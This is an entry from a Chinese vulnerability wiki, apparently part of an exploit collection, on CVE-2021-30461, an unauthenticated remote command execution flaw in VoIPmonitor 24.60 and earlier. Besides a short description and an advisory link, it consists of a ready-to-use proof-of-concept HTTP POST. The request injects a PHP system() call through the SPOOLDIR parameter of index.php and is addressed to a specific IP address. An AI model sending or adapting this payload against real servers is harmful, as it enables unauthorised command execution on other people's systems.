menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right VoIPmonitor UnAuth RCE(CVE-2021-30461).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    VoIPmonitor UnAuth RCE(CVE-2021-30461).md
    527 B / 2021-05-21 09:14:38
        # VoIPmonitor UnAuth RCE(CVE-2021-30461)


VoIPmonitor 是一个开源的实时网络抓包并分析SIP和RTP protocol的程序.使用通过Web界面到达的用户提供的数据,使用SPOOLDIR和recheck参数对index.php文件发出POST请求时,远程攻击者可以运行任意命令。

影响版本:
VoIPmonitor 24.60 及更低版本

poc:

```
POST /index.php HTTP/1.1
Host: 206.166.208.228

SPOOLDIR=test%22.system%28whoami%29.%22
```

ref:

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
    links
    file_download